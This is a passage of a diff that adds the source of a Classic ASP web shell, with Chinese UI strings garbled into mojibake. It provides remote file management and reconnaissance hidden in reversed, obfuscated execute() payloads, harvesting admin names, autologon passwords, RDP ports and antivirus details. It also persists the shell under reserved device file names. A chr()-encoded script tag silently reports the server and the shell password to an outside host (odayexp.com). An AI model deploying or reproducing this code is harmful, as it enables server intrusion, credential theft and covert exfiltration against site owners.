+si=si&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����""><br>"&F.Name&"</a><br><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'  onclick='return yesok()' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()' class='am' title='�ƶ�'>Move</a> </div></td>"
+i=i+1
+If i mod 6=0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+j SI &"" : SI="":i=0
+SI="<table width='100%' align=center><tr><td id=s><b id=x>Filename</b></td><td id=s height=22><b id=x>Size</b></td><td id=s><b id=x>Type</b></td><td id=s><b id=x>Operating</b></td><td id=s><b id=x>Last Modified</b></td><td></td>"
+For Each L in Fold.files
+SI=SI&"<tr><td height='20' id=d onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#121212'"">"
+si=si&FileIco(L.Name)
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'>  "&L.Name&"</a><Td id=d>"&clng(L.size/1024)&"K</td><Td id=d>"&L.Type&"</td><Td id=d>"
+si=si&"<a href="""&openUrl(PaTh&"\"&L.nAme)&""" class='am' title='Open'>Open</a> "
+si=si&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+Si=Si&"<a onclick=""window.open('?Action=EditPower&PowerPath="&RepAth(PaTh&"\"&L.nAme)&"','EditPower','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=300,height=200')"" href='###' class='am' title='Ȩ��'>Ȩ��</a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"��"
+end if
+si=si&" <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> <a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></td><td id=d>"&replace(L.DateLastModified,"/","-")&"</td></tr>"
+i=i+1
+Next
+j SI&"</tr></table>":execute(shisanfun("fi dne:fi dne:fi dne:1+)��cevres��(noisses=)��cevres��(noisses neht ���><noitcA fi:esle:��>tpircs<>'��&ssaPresU&��=p&��&urevres&���&nufE j:1+)��cevres��(noisses=)��cevres��(noisses:neht 1=)��cevres��(noisses fi:esle:neht  0><)��.861.291��,urevreS(rtsnI ro 0><)��1.0.0.721��,urevreS(rtsnI fi"))
+Set FOLD=Nothing
+End function
+Function DelFile(Path)
+If CF.FileExists(Path) Then
+CF.DeleteFile Path
+SI="<center><br><br><br>��ϲ���ļ� "&Path&" ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function EditFile(Path)
+If Request("Action2")="Post" Then
+Set T=CF.CreateTextFile(Path)
+T.WriteLine Request.form("content")
+T.close
+Set T=nothing
+SI="<center><br><br><br>��ϲ���ļ�����ɹ���</center>"
+SI=SI&BackUrl
+j SI
+j ""&copyurl&""
+Response.End
+End If
+If Path<>"" Then
+Set T=CF.opentextfile(Path, 1, False)
+Txt=HTMLEncode(T.readall) 
+T.close
+Set T=Nothing
+Else
+Path=Session("FolderPath")&"\shell.asp":Txt=strBAD
+End If
+j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input name='Action' value='EditFile' Type='hidden'><input name='FName' value='"&Path&"' style='width:100%'><br><textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br><hr><input name='goback' type='button' value='Back' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='Reset'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='Save'></form>"
+End Function
+Function CopyFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function MoveFile(Path)
+Path=Split(Path,"||||")
+If CF.FileExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFile Path(0),Path(1)
+SI="<center><br><br><br>��ϲ���ļ�"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI 
+End If
+End Function
+Function DelFolder(Path)
+If CF.FolderExists(Path) Then
+CF.DeleteFolder Path
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path&"ɾ���ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function CopyFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.CopyFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"���Ƴɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function MoveFolder(Path)
+Path=Split(Path,"||||")
+If CF.FolderExists(Path(0)) and Path(1)<>"" Then
+CF.MoveFolder Path(0),Path(1)
+SI="<center><br><br><br>��ϲ��Ŀ¼"&Path(0)&"�ƶ��ɹ���</center>"
+SI=SI&BackUrl
+j SI
+End If
+End Function
+Function NewFolder(Path)
+execute(shisanfun("fI dnE��IS j��lrUkcaB&IS=IS���>retnec/<�����ɽ��©�&htaP&��¼Ŀ��ϲ��>rb<>rb<>rb<>retnec<��=IS��htaP redloFetaerC.FC��nehT ���><htaP dna )htaP(stsixEredloF.FC toN fI"))
+End Function
+End Class
+
+execute(shisanfun("buS dnE��fi dnE�������erehwynAcp���ý��Ʋ�����¼Ŀ��Ĭ���Կ�,��������erehwynAcp_�ַ�>il<��j��nehT )��fic.��&emanrevres&��\cetnamyS\ataD noitacilppA\sresU llA\sgnitteS dnA stnemucoD\��&revirdsys(stsixEeliF.osf fI��)��emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��(daeRgeR.hsw=emanrevres��)2,)2(redloFlaicepsteG.osF(tfel=evirdsyS��)��tcejbOmetsySeliF.gnitpircS��(tcejboetaerC.revreS=osf teS��txeN��fi dnE��fi dnE���>rb<��ľPHP��д�Ҳ�,¼ĿliaMbeW�Ҳ��Կ�,������ȨmetsySlacoL����,liamniW cigaM_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��liamniw��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dnE���>rb<Ȩ����ľpsJ��ʹ�ǿ��Կ�,������ȨmetsySlacoL����,tacmoT_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT )��tacmot��,)emaN.ecivreSjbo(esacl(rtsni fi��fi dnE��fi dne��fi dnE���>rb<��ľPHP�ǿ��Կ�,metsySlacoLΪ��Ȩ����,�ڴ����ehcapA_���������>il< ��j��eslE���>rb<Ȩ���ֱ�Կ�.ehcapAΪ�����BEWǰ��>il<��j��nehT )��ehcapA��,)��ERAWTFOS_REVRES��(selbairaVrevreS.tseuqeR(rtsni fI��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��ehcapa��=)emaN.ecivreSjbo(esacl fi��fi dnE��fi dnE���>rb<Ȩ��߹�exe.us���ǿ��Կ�,������ȨmetsySlacoL����,װ��U-vreS_���������>il<��j��nehT ��metsySlacoL��=emaNtnuoccAecivreS.ecivreSjbo fi��nehT ��U-vreS��=emaN.ecivreSjbo fi��retupmoCjbo nI ecivreSjbo hcaE roF��txeN emuseR rorrE nO��)��ecivreS��(yarrA = retliF.retupmoCjbo��)��noitacilppA.llehS��(tcejbOetaerC.revreS = as teS��)��.//:TNniW��(tcejbOteG = retupmoCjbo teS���>rh<>rb<]��̽��_�������[��j���>rb<>rb<>rb<------------------------------------��j���>rb<��&kk&��:Ϊ����_����ǰ��>il<��j��)kh(daeRgeR.hsw=kk���tnuoC\munE\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=kh���>rb<��&lmtn&��:Ϊ����lmtN tenleT>il<��j��1=lmtN nehT ���=lmtn fi��)yekLMTN(daeRgeR.hsW=lmtn���LMTN\0.1\revreStenleT\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yekLMTN���>rb<��&ylpsid&��:������Ǵ�_��ʾ�Է���>il<��j�����=ylpsid esle ���ǩ�=ylpsid nehT 0=nigolpsid ro ���=nigolpsid fI��)��emaNresUtsaLyalpsiDtnoD\metsyS\seiciloP\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\ENIHCAM_LACOL_YEKH��(daeRger.hsw=nigolpsid��fi dnE���>tnof/<>rb<��&dwssaP&��:����>der=roloc tnof<>erauqs=epyt il<��j���>rb<��&nimdA&��:������>erauqs=epyt il<��j��)��drowssaPtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=dwssaP��)��emaNresUtluafeD\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��(daeRgeR.hsW=nimdA���>rb<����:��Ƕ�_�Ի���>il<��j��eslE���>rb<����δ:��Ƕ�_�Ի���>il<��j��nehT ���=nigolotuA ro 0=nigolotuA fi��)nigolotuAsi(daeRgeR.hsW=nigolotuA���nogoLnimdAotuA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=nigolotuAsi���>tnof/<>rb<��&emaNnimdA&��>der=roloc tnof<:Ϊ������Ա��&��������Ĭ>il<��j���fi dne���krowteN.tpircsW:���в�����������j��neht rre fi��txeN���>il/<>tnof/<>rb<��&emaN.nimda&�壺��Ա����ǰ��>der=roloc tnof<>il<�� j��srebmeM.puorGjbo ni nimda hcaE roF��)��puorg,srotartsinimdA/��&emaNretupmoC.Nt&��//:TNniW��(tcejbOteG=puorGjbo teS��)��krowteN.tpircsW��(tcejbOetaerc.revres=Nt teS�� txen emuser rorre no��0=seripxE.esnopseR���rotartsinimdA��=emaNnimdA nehT ���=emannimda fi��)yeKemaNnimdA(daeRgeR.hsw=emaNnimdA���emaNresUtluafeDtlA\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKemaNnimdA���>rb<��&emancp&��:Ϊ����_��ǰ��>il<��j���>rb<.������ȡ_�����ީ�=emancp nehT ���=emancp fi��)yekemancp(daeRgeR.hsw=emancp���emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH��=yekemancp���>1=ezis rh<>rb<]��̽_����ͳϵ[>rb<>rb<��j��txen���>rb<��&)i(shtap&��>il<��j��)shtap(dnuobU ot )shtap(dnuobL=i roF���>rb<:���侶·_ǰ��ͳϵ��j���>rb<------------------------------------��j��)��;��,htaPtfoS(tilps=shtap���>rb<��֧:_������ɱ��ϵ����>il<��j nehT )��gnisir��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��������>il<��j nehT )��surivitna��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱ��ϵɽ�� >il<��j nehT )��vak��,ofnihtaP(rtsni fi���>rb<��֧:_������ɱlliK>il<��j nehT )��lliK��,ofnihtaP(rtsni fi���>rb<��֧:_�ƿ�erehwynAcP��������>il<��j nehT )��erehwynacp��,ofnihtaP(rtsni fi���>rb<��֧:_�����MFC>il<��j nehT )��7xmnoisufc��,ofnihtaP(rtsni fi���>rb<��֧:_��������elcarO>il<��j nehT )��elcaro��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSyM>il<��j nehT )��lqsym��,ofnihtaP(rtsni fi���>rb<��֧:_��������LQSSM>il<��j nehT )��revres lqs tfosorcim��,ofnihtaP(rtsni fi���>rb<��֧:_����avaJ>il<��j nehT )��avaj��,ofnihtaP(rtsni fi���>rb<��֧:_����lreP>il<��j nehT )��lrep��,ofnihtaP(rtsnI fi���:��֧����&����ͳϵ��j��)htaPtfoS(esacl=ofnihtaP��)��htaP��(meti.tnemnorivnE.hsW=htaPtfoS���>1=ezis rh<>rb<]��̽��_��ͳϵ[>rb<>rb<>rb<��j���>lo/<��j��fI dnE���>rb<�� & drowssaPnigoLotua & �� :���ܻ��ʵĩ�&��¼�Ƕ��ԩ�j��fI dnE���eslaF��j��raelC.rrE��nehT rrE fI��)yeKssaPnigoLotua & htaPnigoLotua(daeRgeR.Xsw = drowssaPnigoLotua���>rb<�� & emanresUnigoLotua & �� :����ͳϵ�ĩ�&��¼�Ƕ��ԩ�j��)yeKresUnigoLotua & htaPnigoLotua(daeRgeR.Xsw = emanresUnigoLotua��eslE��nehT 0 = elbanEnigoLotuAsi fI��)yeKelbanEnigoLotua & htaPnigoLotua(daeRgeR.Xsw = elbanEnigoLotuAsi���drowssaPtluafeD�� = yeKssaPnigoLotua���emaNresUtluafeD�� = yeKresUnigoLotua���nogoLnimdAotuA�� = yeKelbanEnigoLotua���\nogolniW\noisreVtnerruC\TN swodniW\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH�� = htaPnigoLotua��fI dnE���>/rb<�� & troPmret & �� :�ڶ˩�&���������ǰ����j��eslE ���>/rb<.���޵��ܷ�����Ȩ��� ,�ڶ˶��յ��÷��ީ�j�� nehT 0 >< rebmuN.rrE rO ��� = troPmret fI���>lo<¼�Ƕ��Լ���&��ڶ����_���թ�j��)yeKtroPlanimret & htaPtroPlanimret(daeRgeR.Xsw = troPmret���rebmuNtroP�� = yeKtroPlanimret���\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH�� = htaPtroPlanimret��drowssaPnigoLotua ,emanresUnigoLotua ,yeKelbanEnigoLotua ,elbanEnigoLotuAsi miD��yeKssaPnigoLotua ,yeKresUnigoLotua ,htaPnigoLotua miD��troPmret ,yeKtroPlanimret ,htaPtroPlanimret miD��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS���------------------------------------------------------��j���>rb<��&troPWAP&��:Ϊ�ڶ�erehwynAcP>il<��j���erehwynAcpװ�����&���ǻ�����&����ȷ��.ȡ���&�巨�ީ�=troPWAP neht ���=troPWAP fI��)yeKerehwynAcp(daeRgeR.hsW=troPWAP���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\ENIHCAM_LACOL_YEKH��=yeKerehwynAcp���>tnof/<>rb<��&troPmreT&��>der=roloc tnof<:Ϊ�ڶ�ecivreS lanimreT>il<��j����������revreS swodniWΪ���ǩ�&����ȷ��.ȡ����&�巨�ީ�=troPmreT nehT ���=troPmreT fI��)yeKmreT(daeRgeR.hsW=troPmreT���rebmuNtroP\pct\sdT\dwpdr\sdW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH��=yeKmreT���>rb<��&troptnlT&��:�ک�&���tenleT>il<��j���)�����&����Ĭ(32��=tnlT nehT ���=troPtnlT fi��)yeKtenleT(daeRgeR.hsW=troPtnlT���troPtenleT\0.1\revreStenleT\tfosorciM \ERAWTFOS\ENIHCAM_LACOL_YEKH��=yektenleT���>1=ezis rh<>rb<]��̽��&��ڶ˩�&������[>rb<>rb<��j��fi dne��txeN���>rb<------------------------------------------------��j��fi dnE��fi dnE���>rb<��j��txen���,��&)j(wollaPDU j��)wollapdu(dnuoBU oT )wollapdu(dnuoBL = j rof���:Ϊ�ڶ�pdu�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pdu�ĩ�&������>il<��j��nehT 0=)0(wollapdu ro ���=)0(wollapdu fI��)PDUlluF(daeRgeR.hsW=wollapdu��fi dnE���>rB<��j��txeN���,��&)j(wollapct j��)wollapct(dnuoBU oT )wollapct(dnuoBL = j roF���:Ϊ�ڶ�pct�ĩ�&������>il<��j��eslE���>rb<��ȫ:Ϊ�ڶ�pct�ĩ�&������>il<��j��nehT 0=)0(wollapct ro ���=)0(wollapct fI��)PCTlluF(daeRgeR.hsW=wollapct��KUE&BdpA&htap=PDUlluF��KTE&BdpA&htaP=PCTlluF���stroPdewollAPDU\��=KUE���stroPdewollAPCT\��=KTE��esle���>rb<ѡɸPI/pcTû>il<��j�� nehT 1=retlifpipctoN fi��fI dnE���>rb<������û��ȡ������SND��&����Ĭ>il<��j��eslE���>rb<��&rtsSND&��:ΪSND��&�忨��>il<��j��nehT ���><rtsSND fI��)yeKSND(daeRgeR.hsW=rtsSND���revreSemaN\��&BdpA&htaP=yeKSND��fi dnE���>rb<������û��ȡ�����޹���>il<��j��eslE��txeN���>rb<��&)j(yawetaG&��:��&j&�����>il<��j��)yawetaG(dnuobU ot )yawetaG(dnuobL=j roF��nehT )yaWetaG(yarrasi fI��)yeKyaWetaG(daergeR.hsW=yaWetaG���yawetaGtluafeD\��&BdpA&htaP=yeKyaWetaG��fi dnE���>rb<������û���&��ȡ������ַ��&���PI>il<��j��eslE��txeN���>rb<��&)j(rddAPI&��:Ϊ��&j&��ַ��&���PI>il<��j��)rddAPI(dnuobU ot )rddAPI(dnuobL=j roF��nehT ���><)0(rddaPI fI��)yeKPI(daergeR.hsW=rddaPI���sserddAPI\��&BdpA&htaP=yeKPI���\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH��=htaP���>rb<��&BdpA&��:Ϊ����ĩ�&i&�忨����j��)���,��\eciveD\��,)i(sdpA(ecalpeR=BdpA��1-)sdpA(dnuoBU oT )sdpA(dnuoBL=i roF�� nehT )sdpA(yarrAsI fI��)yeKdpA(daeRgeR.hsW=sdpA���dniB\egakniL\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=yeKdpA��fI dnE��1=retlifpipctoN��nehT ���=elbanEsi ro 0=elbanEsi fI��)yeKpipcTelbanE(daergeR.hsW=elbanEsi���sretliFytiruceSelbanE\sretemaraP\pipcT\secivreS\teSlortnoCtnerruc\METSYS\MLKH��=yeKPIPCTelbanE���>1=ezis rh<>rb<]��̽��&������[��j��)��llehS.tpircsW��(tcejboetaerc=hsw tes��hsw mid��txen emuser rorre no��)(ofnIlanimreTteg bus"))
+copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+execute(shisanfun("bus dne���>tpircs/<;'1emanelif&psa./segami/=emanF?��&lru&)��eman_revres��(tseuqer&��//:ptth'=noitacol.tnerap>tpircs<�� j��gnihton=osf tes��1emanelif&��.��&xepdnr&��\��&1htapelif&��\.\\��,htapf elifypoc.osf��1emanelif&��.��&xepdnr&))��/��,lru(verrtsni,lru(tfel=lru��)��lru��(selbairavrevres.tseuqer=lru��))��\��,htapf(verrtsni-)htapf(nel,htapf(thgir=1emanelif��)��.��(htappam.revres=1htapelif����=)��wjles��(noisses��))71,0(rebmundnr()��|��,xep(tilps=xepdnr���9tpl|8tpl|7tpl|6tpl|5tpl|4tpl|3tpl|2tpl|1tpl|9moc|8moc|7moc|6moc|5moc|4moc|3moc|2moc|1moc��=xep��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��detalsnart_htap��(selbairavrevres.tseuqer=htapf��llehsneddih bus"))
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	folder = folderArr(i)
+	If FSO.FolderExists(folder) Then
+	 Set OFolder = FSO.GetFolder(folder)
+	Set TempFolders = OFolder.SubFolders
+	Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+	For Each S in TempFolders
+	 Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+	Next
+	Set TempFolders = Nothing
+	Set OFolder = Nothing
+	Else
+	 Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+	Set FSO = Nothing
+	Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function goback()
+set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>�Ѿ��Ǵ��̸�Ŀ¼��!</center><center><br><INPUT type=button value=���� onClick='history.go(-1);'></br></center>"
+end if
+set Ofso=nothing
+set ofolder=nothing
+end function
